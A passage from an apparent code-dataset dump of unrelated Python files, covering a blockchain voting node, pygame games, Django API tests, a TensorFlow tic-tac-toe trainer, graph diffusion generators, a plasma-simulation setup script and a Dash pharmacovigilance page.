Vote.objects.all():\n            message = vote.getCandidate() + \":\" + vote.voterDocument\n            # Remove the votes that do not have a valid signature\n            if(not verifySignature(vote.digitalSignature, message , vote.voterPubKey)):\n                print(\"Vote \" + str(vote.id) + \" was removed\")\n                Vote.objects.filter(id=vote.id).delete()\n            # Search for votes that have the same role and the same voter document\n            if(len(Vote.getVotesOnRoleByVoterDocument(vote.voterDocument, vote.candidateRole))>1):\n                # If the vote is not yet in the list, add it\n                if(extraVotes.count([vote.voterDocument, vote.candidateRole])==0):\n                    extraVotes.append([vote.voterDocument, vote.candidateRole])\n\n        # Remove the extra votes a user may have cast for a given role\n        for voterDocument, candidateRole in extraVotes:\n            # Fetch all the extra votes of the same user for the same role\n            votes = Vote.getVotesOnRoleByVoterDocument(voterDocument, candidateRole)\n            # Iterate over them\n            for vote in votes :\n                # If it is not the first one, delete it\n                if(vote.id is not Vote.getFirstVoteOnRoleByVoterDocument(voterDocument, candidateRole)):\n                    Vote.objects.filter(id=vote.id).delete()\n\n        # Votes that will be assigned to the new block\n        votes = Vote.objects.filter(block_id=None)[0:5]\n\n        # If the list of votes is not empty\n        if(votes):\n\n            # Index of the new block\n            # Starts at 1\n            index = Block.objects.count() + 1\n\n            # Serialization of the votes\n            serializedVotes = VoteSerializer(votes, many=True)\n\n            # Conversion of the serialized votes to a string\n            deserializedVotes = json.dumps(serializedVotes.data, indent=3, ensure_ascii=False)\n\n            # If the block being added is the genesis block\n            if(index == 1):\n                previousBlockHash = \"0\" * 64\n            # Otherwise\n            else:\n                # Retrieve the current hash of the last block of the blockchain\n                previousBlockHash = Block.objects.order_by('-pk')[0].currentBlockHash\n\n            # Initial incrementer used when mining the block\n            nonce = 0\n\n            # Difficulty of the block\n            difficulty = services.getCurrentDifficulty()\n\n            # Date and time of the block's creation\n            timestamp = timezone.now()\n\n            # Creation of a new Block object,\n            # passing only the votes and the previous hash\n            newBlock = Block(\n                index = index,\n                timestamp = timestamp,\n                votes = deserializedVotes,\n                difficulty = difficulty,\n                nonce = nonce,\n                previousBlockHash = previousBlockHash\n            )\n\n            # Commit to the database\n            newBlock.save()\n            # Call the asynchronous \"PoW\" task\n            proofOfWork.delay(index)\n\n            # Assign the current block to the votes used\n            for vote in votes:\n                vote.block = newBlock\n                vote.save()\n","sub_path":"votechainNode/nodeProject/nodeApp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":9942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268035733","text":"import pygame\n\n\nclass Block(pygame.sprite.Sprite):\n\n    def __init__(self, x, y, width, height, pic, border=False):\n        '''Initialize the Block instance\n\n        Parameters:\n        x,y : position of the block\n        width, height: size of the block\n        pic: picture for the block\n        border: Is the block used as border of the screen ? 
(default = No)\n '''\n\n # Call the parent class\n pygame.sprite.Sprite.__init__(self)\n\n if border is False:\n self.image = pic\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n elif border is True:\n self.image = pygame.Surface([width, height])\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n","sub_path":"classes/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"166779831","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, timedelta\n\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom alamo.api.models import ServiceResult, CheckResults\n\n\nclass CheckApiTestCase(APITestCase):\n def setUp(self):\n self.check_uuid = 'e2e1ec23-707a-4382-a956-f0cf3276a1b8'\n self.trigger_uuid = 'bd69fcab-5424-44a8-9ac8-24d2c46ec3b8'\n self.service_id = '999'\n now = datetime.now()\n one_minute_ago = now - timedelta(minutes=1)\n two_minutes_ago = now - timedelta(minutes=2)\n ok, fail, unknown = 0, 1, 2\n results = zip(\n [two_minutes_ago, one_minute_ago, now], [unknown, fail, ok]\n )\n for scheduled, result in results:\n kw = dict(\n check_uuid=self.check_uuid,\n trigger_uuid=self.trigger_uuid,\n alert_sent=False,\n status=result, meta={},\n scheduled_time=scheduled,\n execution_time=scheduled,\n insertion_time=scheduled,\n message='', service_id=self.service_id,\n )\n self.result = ServiceResult(**kw)\n self.check_result = CheckResults(**kw)\n self.check_result.save()\n self.result.save()\n\n def tearDown(self):\n ServiceResult.objects.filter(service_id=self.service_id,\n check_uuid=self.check_uuid).delete()\n CheckResults.objects.filter(check_uuid=self.check_uuid,\n trigger_uuid=self.trigger_uuid).delete()\n\n def test_service_result_count(self):\n count = ServiceResult.objects.count()\n self.assertEqual(count, 3)\n\n def test_check_result_count(self):\n count = CheckResults.objects.count()\n self.assertEqual(count, 3)\n\n def test_check_result_list_endpoint(self):\n detail_url = reverse('api-checkresults-list')\n response = self.client.get(detail_url, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, {})\n\n def test_service_result_endpoint(self):\n detail_url = reverse('api-checkresults-multiple')\n response = self.client.post(\n detail_url,\n data={'service_id': self.result.service_id,\n 'checks': [str(self.result.check_uuid)]},\n format='json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 3)\n self.assertEqual(\n len(response.data['results'][self.check_uuid]), 3\n )\n\n def test_check_detail_endpoint(self):\n fields = {'check_uuid', 'insertion_time', 'message', 'meta',\n 'scheduled_time', 'service_id',\n 'status', 'trigger_uuid'}\n detail_url = reverse(\n 'api-checkresults-detail', kwargs={'check_uuid': self.check_uuid}\n )\n response = self.client.get(\n detail_url, data={'triggers': self.trigger_uuid}, format='json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 3)\n for result in response.data['results']:\n for field in fields:\n self.assertIn(field, result)\n\n def test_check_detail_bad_params(self):\n detail_url = reverse(\n 'api-checkresults-detail', kwargs={'check_uuid': self.check_uuid}\n )\n response = self.client.get(detail_url, format='json')\n 
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n","sub_path":"alamo/api/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"625292231","text":"import tensorflow as tf\nimport numpy as np\nimport random as rand\nimport game\n\nNUM_ACTIONS = 18\nNUM_STATES = 90\nGAMMA = 0.2\n\nNUM_TRAINING_GAMES = 10000\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\ndef CreateNetwork():\n input_layer = tf.placeholder(\"float\", [None, NUM_STATES])\n layer_weights = weight_variable([NUM_STATES,50])\n bias = bias_variable([50])\n \n hidden_layer = tf.nn.relu(tf.matmul(input_layer, layer_weights) + bias)\n\n #drop_hidden_layer = tf.nn.dropout(hidden_layer, keep_prob=0.9)\n\n layer2_weights = weight_variable([50,25])\n bias2 = bias_variable([25])\n hidden_layer2 = tf.nn.relu(tf.matmul(hidden_layer, layer2_weights) + bias2)\n\n layer3_weights = weight_variable([25,18])\n bias3 = bias_variable([18])\n hidden_layer3 = tf.nn.relu(tf.matmul(hidden_layer2, layer3_weights) + bias3)\n\n layer4_weights = weight_variable([18,NUM_ACTIONS])\n bias4 = bias_variable([NUM_ACTIONS])\n\n output_layer = tf.nn.softmax(tf.matmul(hidden_layer3, layer4_weights) + bias4)\n return input_layer, output_layer\n\ndef CurrentState():\n # Check the results of training.\n test_board = [np.zeros(90).tolist()]\n\n test_reward = session.run(output_layer_, feed_dict={input_layer_ : test_board})[0]\n print(np.reshape(test_reward[:9],(3,3)))\n input(\"enter\")\n\ndef TrainModel():\n# Number of games to play\n states = []\n actions = []\n rewards = []\n for i in range(NUM_TRAINING_GAMES):\n PlayGame(states, actions, rewards)\n if i % 1000 == 1:\n # train\n print(len(states))\n print(len(actions))\n print(len(rewards))\n session.run(train_operation, feed_dict={input_layer_: states, tf_actions: actions, targets: rewards})\n states = []\n actions = []\n rewards = []\n CurrentState()\n\ndef PlayGame(states, actions, rewards):\n game.CreateBoard()\n\n while True:\n # look at possible moves\n for action in game.PossibleMoves(board):\n new_board = game = UpdateBoard(board, action)\n action_reward = session.run(output_layer_, feed_dict={input_layer_ : new_board})[0]\n \n reward_score = game.MoveScore(board, action) + GAMMA * np.max(action_reward)\n if reward_score == 1:\n reward_score[-1] = -1\n\n print(\"board\")\n print(np.reshape(board[:81], (9,9)))\n print(\"action\")\n print(np.reshape(action[:9], (3,3)))\n print(\"reward\")\n action_reward_score = np.max(action_reward)\n print(reward_score)\n print(action_reward_score)\n input(\"enter\")\n\n states.append(board)\n actions.append(action)\n rewards.append(reward_score)\n result, board = UpdateBoard(board)\n if not result: break\n\n\ndef UpdateBoard(board):\n assert(len(board) == 90), print(board)\n valid_moves = game.PossibleValidMoves(board)\n if (len(valid_moves) == 0): return False, None\n chosen_move = rand.choice(valid_moves)\n if game.MoveScore(board, chosen_move) == 1: return False, None\n board = [board[x] + chosen_move[x] for x in range(len(board))]\n board = 
game.SwitchPlayer(board)\n    return True, board\n\nsession = tf.Session()\ninput_layer_, output_layer_ = CreateNetwork()\n\ntf_actions = tf.placeholder(\"float\", [None, NUM_ACTIONS])\ntargets = tf.placeholder(\"float\", [None])\nreadout_action = tf.reduce_sum(tf.mul(output_layer_, tf_actions), reduction_indices = 1)\n\ncost = tf.reduce_mean(tf.square(targets - readout_action))\ncost = tf.Print(cost, [cost], message=\"This is cost: \") \ntrain_operation = tf.train.AdamOptimizer(0.1).minimize(cost)\n\nsession.run(tf.initialize_all_variables())\nTrainModel()\nprint(\"Done training\")\n","sub_path":"super-tic-tac-toe/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566400579","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport os\nfrom IPython.display import display, HTML\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport simplejson\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom collections import Counter\nfrom sklearn.decomposition import PCA\n\nfilepath = os.getcwd() + '\\\\IntroDS\\\\week1\\\\'\n\n\ndef dummy_fun(doc):\n    return doc\n\ntokenize = lambda doc: doc.lower().split(\" \")\n\npos = pd.read_csv(filepath +'pos.txt')\nneg = pd.read_csv(filepath +'neg.txt')\n\ndef commonWords(file, amount):\n    return pd.Series(' '.join(file).split()).value_counts()[:amount]\n\nwith open(filepath +'neg.txt') as input_file:\n    #build a counter from each word in the file\n    count = Counter(word for line in input_file\n                   for word in line.split())\n\nneg_words = count.most_common(10)\n\nwith open(filepath +'pos.txt') as input_file:\n    #build a counter from each word in the file\n    count = Counter(word for line in input_file\n                   for word in line.split())\n\n\npos_words = count.most_common(10)\n\n\nprint('pos top10 \\n', pos_words)\nprint('neg top10 \\n', neg_words)\n\nvectorizerX = TfidfVectorizer()\nvectorizerY = TfidfVectorizer()\nX = vectorizerX.fit_transform(pos)\nprint(X.shape)\n\npca = PCA(n_components=2).fit(X.toarray())\ndata2D = pca.transform(X.toarray())\nplt.scatter(data2D[:,0], data2D[:,1])\nplt.show()\n\nY = vectorizerY.fit_transform(neg)\nfitted_neg = vectorizerY.fit(neg)\n\nprint('positive vocab: ', vectorizerX.vocabulary_)\nprint('negative vocab: ', vectorizerY.vocabulary_)","sub_path":"IntroDS/week2/textthings.py","file_name":"textthings.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87593904","text":"import networkx\nimport math\nimport scipy.optimize\nimport numpy\nimport sys\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\nfrom IPython.display import Image\nimport pywt\nimport scipy.fftpack\nimport random\nimport operator\nimport copy\nfrom collections import deque\nfrom sklearn.preprocessing import normalize\nfrom sklearn.cluster import SpectralClustering\n\nimport random\n\ndef synthetic_graph(size, num_edges, sparsity, energy, balance, noise):\n\tsize_part_a = int(math.ceil(float(size * balance) / 2))\n\tsize_part_b = size - size_part_a\n\tF = []\n\tedges = {}\n \n\tavg_a = float(numpy.sqrt(float(energy * size) / (size_part_a * size_part_b))) / 2.\n \n\tavg_b = -float(numpy.sqrt(float(energy * size) / (size_part_a * size_part_b))) / 2.\n \n\tfor v in range(size):\n\t\tif v < size_part_a:\n\t\t\tF.append(random.gauss(avg_a, noise*avg_a))\n\t\telse:\n\t\t\tF.append(random.gauss(avg_b, noise*avg_a))\n \n\tG = networkx.Graph()\n \n\tfor v 
in range(size-1):\n\t\tG.add_edge(v,v+1)\n\t\tedges[(v,v+1)] = True\n \n\tremaining_edges = num_edges - len(G.edges())\n\tedges_accross = int((size_part_a * size_part_b * (1.-sparsity) * remaining_edges) / (size * (size-1)))\n\tedges_within = remaining_edges - edges_accross\n \n\tfor e in range(edges_accross):\n\t\tv1 = random.randint(0, size_part_a-1)\n\t\tv2 = random.randint(size_part_a, size-1)\n \n\t\twhile (v1,v2) in edges or v1 == v2:\n\t\t\tv1 = random.randint(0,size_part_a-1)\n\t\t\tv2 = random.randint(size_part_a, size_part_a+size_part_b-1)\n \n\t\tG.add_edge(v1,v2)\n\t\tedges[(v1,v2)] = True\n \n\tfor e in range(edges_within):\n\t\tv1 = random.randint(0,size-1)\n\t\tv2 = random.randint(0,size-1)\n \n\t\tif v1 > v2:\n\t\t\ttmp = v1\n\t\t\tv1 = v2\n\t\t\tv2 = tmp\n \n\t\twhile (v1,v2) in edges or v1 == v2 or (v1 < size_part_a and v2 >= size_part_a) or (v1 >= size_part_a and v2 < size_part_a):\n\t\t\tv1 = random.randint(0,size-1)\n\t\t\tv2 = random.randint(0,size-1)\n \n\t\t\tif v1 > v2:\n\t\t\t\ttmp = v1\n\t\t\t\tv1 = v2\n\t\t\t\tv2 = tmp\n \n\t\tG.add_edge(v1,v2)\n\t\tedges[(v1,v2)] = True\n \n\treturn G, numpy.array(F), edges_accross+1\n\ndef compute_distances(center, graph):\n\tdistances = networkx.shortest_path_length(graph, center)\n \n\treturn distances\n\ndef compute_embedding(distances, radius, graph):\n\tB = []\n\ts = 0\n\tnodes = {}\n\tfor v in graph.nodes():\n\t\tif distances[v] <= radius:\n\t\t\tB.append(1)\n\t\t\ts = s + 1\n\t\telse:\n\t\t\tB.append(0)\n \n\treturn numpy.array(B)\n\ndef generate_dyn_cascade(G, diam, duration, n):\n\tFs = []\n \n\tfor j in range(n):\n\t\tv = random.randint(0, len(G.nodes())-1)\n\t\tdistances = compute_distances(G.nodes()[v], G)\n\n\t\tif diam > duration:\n\t\t\tnum_snaps = diam\n\t\telse:\n\t\t\tnum_snaps = duration\n \n\t\tfor i in range(num_snaps):\n\t\t\tr = int(i * math.ceil(float(diam)/duration))\n \n\t\t\tF = compute_embedding(distances, r, G)\n\t\t\tFs.append(F)\n \n\treturn numpy.array(Fs)\n\ndef generate_dyn_heat(G, s, jump, n):\n\tFs = []\n\tL = networkx.normalized_laplacian_matrix(G)\n\tL = L.todense()\n\tF0s = []\t\n\tseeds = []\n\n\tfor i in range(s):\n\t\tF0 = numpy.zeros(len(G.nodes()))\n\t\tv = random.randint(0, len(G.nodes())-1)\n\t\tseeds.append(v)\n\t\tF0[v] = len(G.nodes())\n\t\tF0s.append(F0)\n\n\tFs.append(numpy.sum(F0s, axis=0))\n\n\tfor j in range(n):\n\t\tFIs = []\n\t\tfor i in range(s):\n\t\t\tFI = numpy.multiply(linalg.expm(-j*jump*L), F0s[i])[:,seeds[i]]\n\t\t\tFIs.append(FI)\n\t\t\n\t\tFs.append(numpy.sum(FIs, axis=0))\n\n\treturn numpy.array(Fs)[1:]\n\ndef generate_dyn_gaussian_noise(G, n):\n\tFs = []\n\t\n\tfor j in range(n):\n\t\tF = numpy.random.rand(len(G.nodes()))\n\t\tFs.append(F)\n\n\treturn numpy.array(Fs)\n\ndef generate_dyn_bursty_noise(G, n):\n\tFs = []\n\tbursty_beta = 1\n\tnon_bursty_beta = 1000\n\tbursty_bursty = 0.7\n\tnon_bursty_non_bursty = 0.9\n\tbursty = False\n\n\tfor j in range(n):\n\t\tr = random.random()\n\n\t\tif not bursty:\n\t\t\tif r > non_bursty_non_bursty:\n\t\t\t\tbursty = True\n\t\telse:\n\t\t\tif r > bursty_bursty:\n\t\t\t\tbursty = False\n\n\t\tif bursty:\t\n\t\t\tF = numpy.random.exponential(bursty_beta, len(G.nodes()))\n\t\telse:\n\t\t\tF = numpy.random.exponential(non_bursty_beta, len(G.nodes()))\n\t\t\t\n\t\tFs.append(F)\n\n\treturn numpy.array(Fs)\n\ndef generate_dyn_indep_cascade(G, s, p):\n\tFs = []\n\t\n\tseeds = numpy.random.choice(len(G.nodes()), s, replace=False)\n\t\n\tF0 = numpy.zeros(len(G.nodes()))\n\t\n\tind = {}\n\ti = 0\n\n\tfor v in G.nodes():\n\t\tind[v] 
= i\n\t\ti = i + 1\n\t\n\tfor s in seeds:\n\t\tF0[s] = 2.0\n\n\twhile True:\n\t\tF1 = numpy.zeros(len(G.nodes()))\n\t\tnew_inf = 0\n\t\tfor v in G.nodes():\n\t\t\tif F0[ind[v]] > 1.0:\n\t\t\t\tfor u in G.neighbors(v):\n\t\t\t\t\tr = random.random()\n\t\t\t\t\tif r <= p and F0[ind[u]] < 1.0:\n\t\t\t\t\t\tF1[ind[u]] = 2.0\n\t\t\t\t\t\tnew_inf = new_inf + 1\n\t\t\t\tF1[ind[v]] = 1.0\n\t\t\t\tF0[ind[v]] = 1.0\n\t\t\telif F0[ind[v]] > 0.0:\n\t\t\t\tF1[ind[v]] = 1.0\n\t\t\n\t\tFs.append(F0)\n\t\t\n\t\tif new_inf == 0 and len(Fs) > 1:\n\t\t\tbreak\n\n\t\tF0 = numpy.copy(F1)\n\t\n\treturn numpy.array(Fs)\n\ndef generate_dyn_linear_threshold(G, s):\n\tFs = []\n\t\n\tseeds = numpy.random.choice(len(G.nodes()), s, replace=False)\n\t\n\tF0 = numpy.zeros(len(G.nodes()))\n\tthresholds = numpy.random.uniform(0.0,1.0,len(G.nodes()))\n\t\n\tind = {}\n\ti = 0\n\n\tfor v in G.nodes():\n\t\tind[v] = i\n\t\ti = i + 1\n\t\n\tfor s in seeds:\n\t\tF0[s] = 1.0\n\n\twhile True:\n\t\tF1 = numpy.zeros(len(G.nodes()))\n\t\tnew_inf = 0\n\t\tfor v in G.nodes():\n\t\t\tif F0[ind[v]] < 1.0:\n\t\t\t\tn = 0\t\t\t\n\t\t\t\tfor u in G.neighbors(v):\n\t\t\t\t\tif F0[ind[u]] > 0:\n\t\t\t\t\t\tn = n + 1\n\t\t\t\t\n\t\t\t\tif (float(n) / len(G.neighbors(v))) >= thresholds[ind[v]]:\n\t\t\t\t\tF1[ind[v]] = 1.0\n\t\t\t\t\tnew_inf = new_inf + 1\n\t\t\telse:\n\t\t\t\tF1[ind[v]] = 1.0\t\t\t\t\t\n\t\n\t\tFs.append(F0)\n\t\t\n\t\tif new_inf == 0 and len(Fs) > 1:\n\t\t\tbreak\n\n\t\tF0 = numpy.copy(F1)\n\t\n\treturn numpy.array(Fs)\n","sub_path":"lib/syn.py","file_name":"syn.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"402367642","text":"#!/usr/bin/env python3\n\"\"\"Initialize the project's data space.\n\nIterates over all defined state points and initializes\nthe associated job workspace directories.\"\"\"\nimport logging\n\nimport prepic.lwfa as lwfa\nimport signac\nimport unyt as u\nimport numpy as np\nimport math\n\n# The number of output hdf5 files, such that Nz * Nr * NUMBER_OF_H5 * size(float64)\n# easily fits in RAM\nNUMBER_OF_H5 = 200\n\n\ndef main():\n \"\"\"Main function, for defining the parameter(s) to be varied in the simulations.\"\"\"\n project = signac.init_project(\"fbpic-project\", workspace=\"/scratch/berceanu/runs/signac-driven-fbpic/workspace/\")\n\n for a0 in np.linspace(start=0.5, stop=5.0, num=2):\n sp = dict(\n # The simulation box\n Nz=4096, # Number of gridpoints along z\n zmin=-70.0e-6, # Left end of the simulation box (meters)\n zmax=30.0e-6, # Right end of the simulation box (meters)\n Nr=256, # Number of gridpoints along r\n rmax=30.0e-6, # Length of the box along r (meters)\n Nm=2, # Number of modes used\n # The particles\n # Position of the beginning of the plasma (meters)\n p_zmin=0.0e-6,\n # Maximal radial position of the plasma (meters)\n p_rmax=27.0e-6,\n n_e=7.5e18 * 1.0e6, # Density (electrons.meters^-3)\n p_nz=2, # Number of particles per cell along z\n p_nr=2, # Number of particles per cell along r\n p_nt=4, # Number of particles per cell along theta\n # The laser\n a0=a0, # Laser amplitude\n w0=9.0e-6, # Laser waist\n ctau=9.0e-6, # Laser duration\n z0=0.0e-6, # Laser centroid\n zf=0.0e-6, # Laser focal plane position\n lambda0=0.8e-6, # Laser wavelength (meters)\n n_c=None, # critical plasma density for this laser (electrons.meters^-3)\n # do not change below this line ##############\n p_zmax=2250.0e-6, # Position of the end of the plasma (meters)\n # The density profile\n 
ramp_start=0.0e-6,\n ramp_length=375.0e-6, # increase (up to `p_zmax`) !\n # The interaction length of the simulation (meters)\n # increase (up to `p_zmax`) to simulate longer distance!\n L_interact=None,\n # Period in number of timesteps\n diag_period=None,\n # Timestep (seconds)\n dt=None,\n # Interaction time (seconds) (to calculate number of PIC iterations)\n # (i.e. the time it takes for the moving window to slide across the plasma)\n T_interact=None,\n # Number of iterations to perform\n N_step=None,\n )\n\n laser = lwfa.Laser.from_a0(\n a0=sp[\"a0\"] * u.dimensionless,\n τL=(sp[\"ctau\"] * u.meter) / u.clight,\n beam=lwfa.GaussianBeam(w0=sp[\"w0\"] * u.meter, λL=sp[\"lambda0\"] * u.meter),\n )\n sp[\"n_c\"] = laser.ncrit.to_value('1/m**3')\n\n sp[\"L_interact\"] = 900.0e-6 - (sp[\"zmax\"] - sp[\"zmin\"])\n sp[\"dt\"] = (sp[\"zmax\"] - sp[\"zmin\"]) / sp[\"Nz\"] / u.clight.to_value('m/s')\n sp[\"T_interact\"] = (sp[\"L_interact\"] + (sp[\"zmax\"] - sp[\"zmin\"])) / u.clight.to_value('m/s')\n sp[\"N_step\"] = int(sp[\"T_interact\"] / sp[\"dt\"])\n sp[\"diag_period\"] = math.ceil(sp[\"N_step\"] / NUMBER_OF_H5)\n\n project.open_job(sp).init()\n\n project.write_statepoints()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n main()\n","sub_path":"signac/src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414015835","text":"import sys\nimport pygame.freetype\n\nBLUE = (106, 159, 181)\nDARKBLUE = (0, 0, 55)\nRED = (255, 50, 50)\nWHITE = (255, 255, 255)\nGREEN = (0, 200, 0)\nLIGHTGREY = (197, 212, 219)\nDARKGREY = (145, 157, 163)\n\nASPECTRATIO = 16 / 9\n\npygame.init()\n\ninfo = pygame.display.Info()\n\nif info.current_w / info.current_h < ASPECTRATIO:\n\tWINDOWWIDTH = info.current_w - 100\n\tWINDOWHEIGHT = int(info.current_w / ASPECTRATIO) - 100\nelse:\n\tWINDOWHEIGHT = info.current_h-100 # 1670\n\tWINDOWWIDTH = int(ASPECTRATIO * WINDOWHEIGHT)\n\n\nBTNHEIGHT = int(WINDOWHEIGHT / 15)\nBTNWIDTH = BTNHEIGHT * 6\nBTNSPACING = 1.5\nFONTSIZE = int(BTNHEIGHT / 2.5)\n\nBTNWIDTH_SMALL = int(BTNHEIGHT * 1)\nBTNHEIGHT_SMALL = int(BTNHEIGHT * 1)\nFONTSIZE_SMALL = int(BTNHEIGHT_SMALL / 2.5)\n\n\n\n\n#850\nboardSize = (WINDOWWIDTH/2) - 100 # 750\n\nFAQ_SIZE = None\nFAQ_FONTSIZE = int(FONTSIZE * 0.55)\nFAQ\t= \t\"\"\"Welcome to battleship! Prepare for war!\n\\n How To Play \\n\nIn this game, each player can place up to six ships on their board.\\n\nPlayers take turns attacking enemy vessels. \\n\nThe game is over when someone loses their whole fleet.\\n\n\\n GameSetup \\n\nSelect to play against a human or computer with the Player button.\\n\nSelect the number of ships to place with the '# of Ships' button.\\n\nIf playing against the computer, change the difficulty with 'Difficulty' button. 
\\n\nYou can change the volume with the two 'BGM' and 'SFX' buttons.\\n\n\\n\nGood luck sardine, you're going to need it!\"\"\"\n\ndef createParagraph(text, fontSize, textcolor, bgcolor, paragraphSize):\n\t#paragraphSize= (xsize, ysize)\n\t#fontSize=font.get_height()\n\tfont = pygame.freetype.SysFont(\"Courier\", fontSize, bold = True)\n\n\tparagraphSurf = pygame.Surface(paragraphSize)\n\n\tparagraphSurf.fill(BLUE)\n\tparagraphSurf.set_colorkey((0, 0, 0))\n\n\tsplitLines = text.splitlines()#False)\n\t#print(splitLines)\n\n\n\n\toffSet = (paragraphSize[1] - len(splitLines) * (fontSize + 1)) // 2\n\n\tfor idx, line in enumerate(splitLines):\n\t\tcurrentTextline, _ = font.render(text=line, fgcolor=WHITE, bgcolor=BLUE)\n\t\t#currentPosition = (0, idx * fontSize + offSet)\n\t\t#center paragraph\n\t\tcurrentPosition = ((paragraphSize[0] - currentTextline.get_width()) // 2, #x-coordinate\n idx * fontSize + offSet) #y-coordinate\n\t\tparagraphSurf.blit(currentTextline, currentPosition)\n\n\treturn paragraphSurf, paragraphSize\n\n\n\t#backButton = button(x, y, w, h, inactive, active, mainMenu()):\n\n\t#for event in pygame.event.get():\n\t\t#if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\n\t\t\t#self.stateName = 'mainMenu'\n\t\t\t#break\n\ndef createText(text, fontSize, textcolor, bgcolor):\n font = pygame.freetype.SysFont(\"Courier\", fontSize, bold=True)\n surface, rect = font.render(text=text, fgcolor=textcolor, bgcolor=bgcolor)\n return surface\n\ndef quitGame():\n pygame.quit()\n sys.exit()\n\n\n\ndef defaultAction():\n print('no action defined')\n","sub_path":"auxx.py","file_name":"auxx.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"143393090","text":"from typing import Tuple\nfrom urllib.parse import parse_qs, quote_plus, unquote_plus, urlencode, urlparse\n\nimport dash\nimport dash.dependencies as dd\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\nfrom app import app\nfrom apps.components.commons import (\n EICasDeclareFigureBox,\n EIRepartitionAgeGraphBox,\n EIRepartitionGraviteGraphBox,\n EIRepartitionHLTBox,\n EIRepartitionSexeFigureBox,\n EITauxDeclarationBox,\n EITauxDeclarationSeveriteBox,\n Header,\n NoData,\n PatientsTraites,\n RepartitionNotificateursFigureBox,\n SystemesOrganes,\n last_update,\n)\n\nfrom .footer import footer_content\nfrom .utils import Box\nfrom dash.development.base_component import Component\nfrom dash.exceptions import PreventUpdate\nfrom datamed_custom_components.Accordion import Accordion\nfrom db import fetch_data, substance\nfrom sm import SideMenu\n\nfrom ..constants.colors import PIE_COLORS_SUBSTANCE\nfrom .utils import Box, Grid, TopicSection, trim_list\n\n\ndef EffetsIndesirablesTooltip(tooltip_open=False) -> Component:\n return Box(\n Accordion(\n [\n html.P(\n \"La pharmacovigilance a pour objet la surveillance des médicaments et la prévention du risque \"\n \"d’effet indésirable résultant de leur utilisation, que ce risque soit potentiel ou avéré. \"\n \"Elle constitue une garantie qui s’exerce tout au long de la vie d’un médicament.\",\n ),\n html.P(\n [\n html.Span(\n \"La Base Nationale de Pharmacovigilance (BNPV) est une base de données située à l'ANSM \"\n \"qui est alimentée par les Centres Régionaux de Pharmacovigilance (CRPV) après évaluation, \"\n \"validation et imputation des déclarations de cas d'effets indésirables. 
Ils sont notifiés \"\n \"par les professionnels de santé ou par les patients et association agréées via un portail dédié : \",\n ),\n html.A(\n \"signalement.social-sante.gouv.fr\",\n href=\"https://signalement.social-sante.gouv.fr\",\n className=\"Link\",\n target=\"_blank\",\n ),\n ]\n ),\n html.P(\n \"Les indicateurs représentent le nombre de cas notifiés d’effets indésirables en France, estimé à partir des données de la BNPV. \"\n \"Afin de conserver l'anonymat des patients, si un effet indésirable est déclaré dans moins de 11 cas au total, cet effet ne sera \"\n \"pas affiché. Cela permet de ne pas identifier le ou les patients concernés, notamment en cas d'effets rares.\",\n ),\n ],\n isOpenOnFirstRender=tooltip_open,\n labelClass=\"InternalLink normal-text\",\n label=\"Comment sont calculés ces indicateurs ? D'où viennent ces données ?\",\n ),\n )\n\n\ndef substance_layout(code: str) -> Tuple[Component, html.Div]:\n \"\"\"\n @param code: substance code\n \"\"\"\n df_sub = substance.get_substance_df(code)\n series_sub = fetch_data.as_series(df_sub)\n df_sub_spe = substance.list_specialite(code)\n df_age = substance.get_age_df(code)\n df_sexe = substance.get_sexe_df(code)\n df_expo = substance.get_exposition_df(code)\n df_notif = substance.get_notif_df(code)\n df_cas_age = substance.get_age_cas_df(code)\n df_cas_sexe = substance.get_sexe_cas_df(code)\n df_gravite = substance.get_gravite(code)\n\n return (\n Header(series_sub, type=\"substance\"),\n html.Div(\n [\n html.Div(\n [\n SideMenu(\n id=\"side-menu\",\n items=[\n {\"id\": \"patients-traites\", \"label\": \"Population concernée\"},\n 